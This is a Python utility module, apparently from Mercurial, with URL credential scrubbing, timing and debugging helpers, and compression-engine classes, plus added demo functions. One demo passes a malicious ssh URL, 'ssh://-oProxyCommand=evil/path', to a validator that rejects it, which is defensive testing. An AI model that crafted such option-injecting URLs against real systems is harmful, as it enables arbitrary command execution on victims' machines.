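# checksafessh() rejects ssh URLs whose first component begins with '-',
# which ssh would otherwise parse as a command-line option.
def _demochecksafessh():
    try:
        checksafessh('ssh://-oProxyCommand=evil/path')
    except error.Abort:
        return 'rejected'
    checksafessh('ssh://user@host/path')  # a normal URL passes silently
    return 'accepted'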

def hidepassword(u):
    '''hide user credential in a url string'''
    u = url(u)
    if u.passwd:
        u.passwd = '***'
    return bytes(u)

def removeauth(u):
    '''remove all authentication information from a url string'''
    u = url(u)
    u.user = u.passwd = None
    return str(u)
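
# Editor's note: an illustrative sketch, not part of the original module.
# hidepassword() masks only the password component, while removeauth()
# drops both the user and the password.
def _demoauthscrub():
    assert hidepassword('http://joe:secret@host/') == 'http://joe:***@host/'
    assert removeauth('http://joe:secret@host/') == 'http://host/'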

timecount = unitcountfn(
    (1, 1e3, _('%.0f s')),
    (100, 1, _('%.1f s')),
    (10, 1, _('%.2f s')),
    (1, 1, _('%.3f s')),
    (100, 0.001, _('%.1f ms')),
    (10, 0.001, _('%.2f ms')),
    (1, 0.001, _('%.3f ms')),
    (100, 0.000001, _('%.1f us')),
    (10, 0.000001, _('%.2f us')),
    (1, 0.000001, _('%.3f us')),
    (100, 0.000000001, _('%.1f ns')),
    (10, 0.000000001, _('%.2f ns')),
    (1, 0.000000001, _('%.3f ns')),
    )

_timenesting = [0]

def timed(func):
    '''Report the execution time of a function call to stderr.

    During development, use as a decorator when you need to measure
    the cost of a function, e.g. as follows:

    @util.timed
    def foo(a, b, c):
        pass
    '''

    def wrapper(*args, **kwargs):
        start = timer()
        indent = 2
        _timenesting[0] += indent
        try:
            return func(*args, **kwargs)
        finally:
            elapsed = timer() - start
            _timenesting[0] -= indent
            stderr.write('%s%s: %s\n' %
                         (' ' * _timenesting[0], func.__name__,
                          timecount(elapsed)))
    return wrapper

_sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
              ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))

def sizetoint(s):
    '''Convert a space specifier to a byte count.

    >>> sizetoint('30')
    30
    >>> sizetoint('2.2kb')
    2252
    >>> sizetoint('6M')
    6291456
    '''
    t = s.strip().lower()
    try:
        for k, u in _sizeunits:
            if t.endswith(k):
                return int(float(t[:-len(k)]) * u)
        return int(t)
    except ValueError:
        raise error.ParseError(_("couldn't parse size: %s") % s)

class hooks(object):
    '''A collection of hook functions that can be used to extend a
    function's behavior. Hooks are called in lexicographic order,
    based on the names of their sources.'''

    def __init__(self):
        self._hooks = []

    def add(self, source, hook):
        self._hooks.append((source, hook))

    def __call__(self, *args):
        self._hooks.sort(key=lambda x: x[0])
        results = []
        for source, hook in self._hooks:
            results.append(hook(*args))
        return results
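
# Editor's note: an illustrative sketch, not part of the original module.
# Hooks fire in lexicographic order of their source names, regardless of
# the order in which they were added.
def _demohooks():
    h = hooks()
    h.add('zzz-ext', lambda x: x * 2)
    h.add('aaa-ext', lambda x: x + 1)
    return h(10)  # [11, 20]: 'aaa-ext' fires before 'zzz-ext'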

def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%s', depth=0):
    '''Yields lines for a nicely formatted stacktrace.
    Skips the 'skip' last entries, then returns the last 'depth' entries.
    Each file+linenumber is formatted according to fileline.
    Each line is formatted according to line.
    If line is None, it yields:
      length of longest filepath+line number,
      filepath+linenumber,
      function

    Not to be used in production code, but very convenient while developing.
    '''
    entries = [(fileline % (fn, ln), func)
               for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
               ][-depth:]
    if entries:
        fnmax = max(len(entry[0]) for entry in entries)
        for fnln, func in entries:
            if line is None:
                yield (fnmax, fnln, func)
            else:
                yield line % (fnmax, fnln, func)

def debugstacktrace(msg='stacktrace', skip=0,
                    f=stderr, otherf=stdout, depth=0):
    '''Writes a message to f (stderr) with a nicely formatted stacktrace.
    Skips the 'skip' entries closest to the call, then shows 'depth' entries.
    By default it will flush stdout first.
    It can be used everywhere and intentionally does not require an ui object.
    Not to be used in production code, but very convenient while developing.
    '''
    if otherf:
        otherf.flush()
    f.write('%s at:\n' % msg.rstrip())
    for line in getstackframes(skip + 1, depth=depth):
        f.write(line)
    f.flush()
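
# Editor's note: an illustrative sketch, not part of the original module.
# debugstacktrace() is meant for ad-hoc debugging: drop a call like this
# into a suspect code path and the message plus the five innermost frames
# are written to stderr.
def _demostacktrace():
    debugstacktrace('entered suspicious branch', depth=5)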

class dirs(object):
    '''a multiset of directory names from a dirstate or manifest'''

    def __init__(self, map, skip=None):
        self._dirs = {}
        addpath = self.addpath
        if safehasattr(map, 'iteritems') and skip is not None:
            for f, s in map.iteritems():
                if s[0] != skip:
                    addpath(f)
        else:
            for f in map:
                addpath(f)

    def addpath(self, path):
        dirs = self._dirs
        for base in finddirs(path):
            if base in dirs:
                dirs[base] += 1
                return
            dirs[base] = 1

    def delpath(self, path):
        dirs = self._dirs
        for base in finddirs(path):
            if dirs[base] > 1:
                dirs[base] -= 1
                return
            del dirs[base]

    def __iter__(self):
        return iter(self._dirs)

    def __contains__(self, d):
        return d in self._dirs

if safehasattr(parsers, 'dirs'):
    dirs = parsers.dirs

def finddirs(path):
    pos = path.rfind('/')
    while pos != -1:
        yield path[:pos]
        pos = path.rfind('/', 0, pos)

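# Editor's note: an illustrative sketch, not part of the original module.
# finddirs() yields ancestor directories from deepest to shallowest, and
# dirs (pure-Python above, or the C version from parsers) behaves as a
# multiset over those ancestors.
def _demodirs():
    assert list(finddirs('a/b/c')) == ['a/b', 'a']
    d = dirs(['a/b/f1', 'a/b/f2', 'a/c/f3'])
    assert 'a' in d and 'a/b' in d and 'a/b/c' not in d
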
# compression code

SERVERROLE = 'server'
CLIENTROLE = 'client'

compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
                                               (u'name', u'serverpriority',
                                                u'clientpriority'))

class compressormanager(object):
    """Holds registrations of various compression engines.

    This class essentially abstracts the differences between compression
    engines to allow new compression formats to be added easily, possibly from
    extensions.

    Compressors are registered against the global instance by calling its
    ``register()`` method.
    """
    def __init__(self):
        self._engines = {}
        # Bundle spec human name to engine name.
        self._bundlenames = {}
        # Internal bundle identifier to engine name.
        self._bundletypes = {}
        # Revlog header to engine name.
        self._revlogheaders = {}
        # Wire proto identifier to engine name.
        self._wiretypes = {}

    def __getitem__(self, key):
        return self._engines[key]

    def __contains__(self, key):
        return key in self._engines

    def __iter__(self):
        return iter(self._engines.keys())

    def register(self, engine):
        """Register a compression engine with the manager.

        The argument must be a ``compressionengine`` instance.
        """
        if not isinstance(engine, compressionengine):
            raise ValueError(_('argument must be a compressionengine'))

        name = engine.name()

        if name in self._engines:
            raise error.Abort(_('compression engine %s already registered') %
                              name)

        bundleinfo = engine.bundletype()
        if bundleinfo:
            bundlename, bundletype = bundleinfo

            if bundlename in self._bundlenames:
                raise error.Abort(_('bundle name %s already registered') %
                                  bundlename)
            if bundletype in self._bundletypes:
                raise error.Abort(_('bundle type %s already registered by %s') %
                                  (bundletype, self._bundletypes[bundletype]))

            # bundlename may be None if no external-facing name was declared.
            if bundlename:
                self._bundlenames[bundlename] = name

            self._bundletypes[bundletype] = name

        wiresupport = engine.wireprotosupport()
        if wiresupport:
            wiretype = wiresupport.name
            if wiretype in self._wiretypes:
                raise error.Abort(_('wire protocol compression %s already '
                                    'registered by %s') %
                                  (wiretype, self._wiretypes[wiretype]))

            self._wiretypes[wiretype] = name

        revlogheader = engine.revlogheader()
        if revlogheader and revlogheader in self._revlogheaders:
            raise error.Abort(_('revlog header %s already registered by %s') %
                              (revlogheader, self._revlogheaders[revlogheader]))

        if revlogheader:
            self._revlogheaders[revlogheader] = name

        self._engines[name] = engine

    @property
    def supportedbundlenames(self):
        return set(self._bundlenames.keys())

    @property
    def supportedbundletypes(self):
        return set(self._bundletypes.keys())

    def forbundlename(self, bundlename):
        """Obtain a compression engine registered to a bundle name.

        Will raise KeyError if the bundle type isn't registered.

        Will abort if the engine is known but not available.
        """
        engine = self._engines[self._bundlenames[bundlename]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def forbundletype(self, bundletype):
        """Obtain a compression engine registered to a bundle type.

        Will raise KeyError if the bundle type isn't registered.

        Will abort if the engine is known but not available.
        """
        engine = self._engines[self._bundletypes[bundletype]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def supportedwireengines(self, role, onlyavailable=True):
        """Obtain compression engines that support the wire protocol.

        Returns a list of engines in prioritized order, most desired first.

        If ``onlyavailable`` is set, filter out engines that can't be
        loaded.
        """
        assert role in (SERVERROLE, CLIENTROLE)

        attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'

        engines = [self._engines[e] for e in self._wiretypes.values()]
        if onlyavailable:
            engines = [e for e in engines if e.available()]

        def getkey(e):
            # Sort first by priority, highest first. In case of tie, sort
            # alphabetically. This is arbitrary, but ensures output is
            # stable.
            w = e.wireprotosupport()
            return -1 * getattr(w, attr), w.name

        return list(sorted(engines, key=getkey))

    def forwiretype(self, wiretype):
        engine = self._engines[self._wiretypes[wiretype]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def forrevlogheader(self, header):
        """Obtain a compression engine registered to a revlog header.

        Will raise KeyError if the revlog header value isn't registered.
        """
        return self._engines[self._revlogheaders[header]]

compengines = compressormanager()

class compressionengine(object):
    """Base class for compression engines.

    Compression engines must implement the interface defined by this class.
    """
    def name(self):
        """Returns the name of the compression engine.

        This is the key the engine is registered under.

        This method must be implemented.
        """
        raise NotImplementedError()

    def available(self):
        """Whether the compression engine is available.

        The intent of this method is to allow optional compression engines
        that may not be available in all installations (such as engines relying
        on C extensions that may not be present).
        """
        return True

    def bundletype(self):
        """Describes bundle identifiers for this engine.

        If this compression engine isn't supported for bundles, returns None.

        If this engine can be used for bundles, returns a 2-tuple of strings of
        the user-facing "bundle spec" compression name and an internal
        identifier used to denote the compression format within bundles. To
        exclude the name from external usage, set the first element to ``None``.

        If bundle compression is supported, the class must also implement
        ``compressstream`` and ``decompressorreader``.

        The docstring of this method is used in the help system to tell users
        about this engine.
        """
        return None

    def wireprotosupport(self):
        """Declare support for this compression format on the wire protocol.

        If this compression engine isn't supported for compressing wire
        protocol payloads, returns None.

        Otherwise, returns ``compenginewireprotosupport`` with the following
        fields:

        * String format identifier
        * Integer priority for the server
        * Integer priority for the client

        The integer priorities are used to order the advertisement of format
        support by server and client. The highest integer is advertised
        first. Integers with non-positive values aren't advertised.

        The priority values are somewhat arbitrary and only used for default
        ordering. The relative order can be changed via config options.

        If wire protocol compression is supported, the class must also implement
        ``compressstream`` and ``decompressorreader``.
        """
        return None

    def revlogheader(self):
        """Header added to revlog chunks that identifies this engine.

        If this engine can be used to compress revlogs, this method should
        return the bytes used to identify chunks compressed with this engine.
        Else, the method should return ``None`` to indicate it does not
        participate in revlog compression.
        """
        return None

    def compressstream(self, it, opts=None):
        """Compress an iterator of chunks.

        The method receives an iterator (ideally a generator) of chunks of
        bytes to be compressed. It returns an iterator (ideally a generator)
        of bytes of chunks representing the compressed output.

        Optionally accepts an argument defining how to perform compression.
        Each engine treats this argument differently.
        """
        raise NotImplementedError()

    def decompressorreader(self, fh):
        """Perform decompression on a file object.

        Argument is an object with a ``read(size)`` method that returns
        compressed data. Return value is an object with a ``read(size)`` that
        returns uncompressed data.
        """
        raise NotImplementedError()

    def revlogcompressor(self, opts=None):
        """Obtain an object that can be used to compress revlog entries.

        The object has a ``compress(data)`` method that compresses binary
        data. This method returns compressed binary data or ``None`` if
        the data could not be compressed (too small, not compressible, etc).
        The returned data should have a header uniquely identifying this
        compression format so decompression can be routed to this engine.
        This header should be identified by the ``revlogheader()`` return
        value.

        The object has a ``decompress(data)`` method that decompresses
        data. The method will only be called if ``data`` begins with
        ``revlogheader()``. The method should return the raw, uncompressed
        data or raise a ``RevlogError``.

        The object is reusable but is not thread safe.
        """
        raise NotImplementedError()

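# Editor's note: an illustrative sketch, not part of the original module.
# It shows the minimal surface a third-party engine would implement before
# being handed to compengines.register(). The identity transforms below are
# placeholders, not a real codec, and the class is never registered here.
class _demoengine(compressionengine):
    def name(self):
        return 'demo'

    def bundletype(self):
        """Hypothetical engine used only for illustration."""
        return 'demo', 'DM'

    def compressstream(self, it, opts=None):
        return it  # a real engine would yield compressed chunks

    def decompressorreader(self, fh):
        return fh  # a real engine would wrap fh in a decompressor
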
class _zlibengine(compressionengine):
    def name(self):
        return 'zlib'

    def bundletype(self):
        """zlib compression using the DEFLATE algorithm.

        All Mercurial clients should support this format. The compression
        algorithm strikes a reasonable balance between compression ratio
        and size.
        """
        return 'gzip', 'GZ'

    def wireprotosupport(self):
        return compewireprotosupport('zlib', 20, 20)

    def revlogheader(self):
        return 'x'

    def compressstream(self, it, opts=None):
        opts = opts or {}

        z = zlib.compressobj(opts.get('level', -1))
        for chunk in it:
            data = z.compress(chunk)
            # Not all calls to compress emit data. It is cheaper to inspect
            # here than to feed empty chunks through generator.
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        def gen():
            d = zlib.decompressobj()
            for chunk in filechunkiter(fh):
                while chunk:
                    # Limit output size to limit memory.
                    yield d.decompress(chunk, 2 ** 18)
                    chunk = d.unconsumed_tail

        return chunkbuffer(gen())

    class zlibrevlogcompressor(object):
        def compress(self, data):
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            if insize < 44:
                return None

            elif insize <= 1000000:
                compressed = zlib.compress(data)
                if len(compressed) < insize:
                    return compressed
                return None

            # zlib makes an internal copy of the input buffer, doubling
            # memory usage for large inputs. So do streaming compression
            # on large inputs.
            else:
                z = zlib.compressobj()
                parts = []
                pos = 0
                while pos < insize:
                    pos2 = pos + 2**20
                    parts.append(z.compress(data[pos:pos2]))
                    pos = pos2
                parts.append(z.flush())

                if sum(map(len, parts)) < insize:
                    return ''.join(parts)
                return None

        def decompress(self, data):
            try:
                return zlib.decompress(data)
            except zlib.error as e:
                raise error.RevlogError(_('revlog decompress error: %s') %
                                        str(e))

    def revlogcompressor(self, opts=None):
        return self.zlibrevlogcompressor()

compengines.register(_zlibengine())

class _bz2engine(compressionengine):
    def name(self):
        return 'bz2'

    def bundletype(self):
        """An algorithm that produces smaller bundles than ``gzip``.

        All Mercurial clients should support this format.

        This engine will likely produce smaller bundles than ``gzip`` but
        will be significantly slower, both during compression and
        decompression.

        If available, the ``zstd`` engine can yield similar or better
        compression at much higher speeds.
        """
        return 'bzip2', 'BZ'

    # We declare a protocol name but don't advertise by default because
    # it is slow.
    def wireprotosupport(self):
        return compewireprotosupport('bzip2', 0, 0)

    def compressstream(self, it, opts=None):
        opts = opts or {}
        z = bz2.BZ2Compressor(opts.get('level', 9))
        for chunk in it:
            data = z.compress(chunk)
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        def gen():
            d = bz2.BZ2Decompressor()
            for chunk in filechunkiter(fh):
                yield d.decompress(chunk)

        return chunkbuffer(gen())

compengines.register(_bz2engine())

class _truncatedbz2engine(compressionengine):
    def name(self):
        return 'bz2truncated'

    def bundletype(self):
        return None, '_truncatedBZ'

    # We don't implement compressstream because it is hackily handled elsewhere.

    def decompressorreader(self, fh):
        def gen():
            # The input stream doesn't have the 'BZ' header. So add it back.
            d = bz2.BZ2Decompressor()
            d.decompress('BZ')
            for chunk in filechunkiter(fh):
                yield d.decompress(chunk)

        return chunkbuffer(gen())

compengines.register(_truncatedbz2engine())

class _noopengine(compressionengine):
    def name(self):
        return 'none'

    def bundletype(self):
        """No compression is performed.

        Use this compression engine to explicitly disable compression.
        """
        return 'none', 'UN'

    # Clients always support uncompressed payloads. Servers don't because
    # unless you are on a fast network, uncompressed payloads can easily
    # saturate your network pipe.
    def wireprotosupport(self):
        return compewireprotosupport('none', 0, 10)

    # We don't implement revlogheader because it is handled specially
    # in the revlog class.

    def compressstream(self, it, opts=None):
        return it

    def decompressorreader(self, fh):
        return fh

    class nooprevlogcompressor(object):
        def compress(self, data):
            return None

    def revlogcompressor(self, opts=None):
        return self.nooprevlogcompressor()

compengines.register(_noopengine())

class _zstdengine(compressionengine):
    def name(self):
        return 'zstd'

    @propertycache
    def _module(self):
        # Not all installs have the zstd module available. So defer importing
        # until first access.
        try:
            from . import zstd
            # Force delayed import.
            zstd.__version__
            return zstd
        except ImportError:
            return None

    def available(self):
        return bool(self._module)

    def bundletype(self):
        """A modern compression algorithm that is fast and highly flexible.

        Only supported by Mercurial 4.1 and newer clients.

        With the default settings, zstd compression is both faster and yields
        better compression than ``gzip``. It also frequently yields better
        compression than ``bzip2`` while operating at much higher speeds.

        If this engine is available and backwards compatibility is not a
        concern, it is likely the best available engine.
        """
        return 'zstd', 'ZS'

    def wireprotosupport(self):
        return compewireprotosupport('zstd', 50, 50)

    def revlogheader(self):
        return '\x28'

    def compressstream(self, it, opts=None):
        opts = opts or {}
        # zstd level 3 is almost always significantly faster than zlib
        # while providing no worse compression. It strikes a good balance
        # between speed and compression.
        level = opts.get('level', 3)

        zstd = self._module
        z = zstd.ZstdCompressor(level=level).compressobj()
        for chunk in it:
            data = z.compress(chunk)
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        zstd = self._module
        dctx = zstd.ZstdDecompressor()
        return chunkbuffer(dctx.read_from(fh))

    class zstdrevlogcompressor(object):
        def __init__(self, zstd, level=3):
            # Writing the content size adds a few bytes to the output. However,
            # it allows decompression to be more optimal since we can
            # pre-allocate a buffer to hold the result.
            self._cctx = zstd.ZstdCompressor(level=level,
                                             write_content_size=True)
            self._dctx = zstd.ZstdDecompressor()
            self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
            self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE

        def compress(self, data):
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            if insize < 50:
                return None

            elif insize <= 1000000:
                compressed = self._cctx.compress(data)
                if len(compressed) < insize:
                    return compressed
                return None
            else:
                z = self._cctx.compressobj()
                chunks = []
                pos = 0
                while pos < insize:
                    pos2 = pos + self._compinsize
                    chunk = z.compress(data[pos:pos2])
                    if chunk:
                        chunks.append(chunk)
                    pos = pos2
                chunks.append(z.flush())

                if sum(map(len, chunks)) < insize:
                    return ''.join(chunks)
                return None

        def decompress(self, data):
            insize = len(data)

            try:
                # This was measured to be faster than other streaming
                # decompressors.
                dobj = self._dctx.decompressobj()
                chunks = []
                pos = 0
                while pos < insize:
                    pos2 = pos + self._decompinsize
                    chunk = dobj.decompress(data[pos:pos2])
                    if chunk:
                        chunks.append(chunk)
                    pos = pos2
                # Frame should be exhausted, so no finish() API.

                return ''.join(chunks)
            except Exception as e:
                raise error.RevlogError(_('revlog decompress error: %s') %
                                        str(e))

    def revlogcompressor(self, opts=None):
        opts = opts or {}
        return self.zstdrevlogcompressor(self._module,
                                         level=opts.get('level', 3))

compengines.register(_zstdengine())

def bundlecompressiontopics():
    """Obtains a list of available bundle compressions for use in help."""
    # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
    items = {}

    # We need to format the docstring. So use a dummy object/type to hold it
    # rather than mutating the original.
    class docobject(object):
        pass

    for name in compengines:
        engine = compengines[name]

        if not engine.available():
            continue

        bt = engine.bundletype()
        if not bt or not bt[0]:
            continue

        doc = pycompat.sysstr('``%s``\n    %s') % (
            bt[0], engine.bundletype.__doc__)

        value = docobject()
        value.__doc__ = doc
        value._origdoc = engine.bundletype.__doc__
        value._origfunc = engine.bundletype

        items[bt[0]] = value

    return items

i18nfunctions = bundlecompressiontopics().values()

# convenient shortcut
dst = debugstacktrace
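
# Editor's note: an illustrative sketch, not part of the original module.
# How a caller typically resolves an engine by bundle name and compresses
# a stream of chunks with it.
def _demobundlecompress(chunks):
    engine = compengines.forbundlename('gzip')
    return ''.join(engine.compressstream(iter(chunks)))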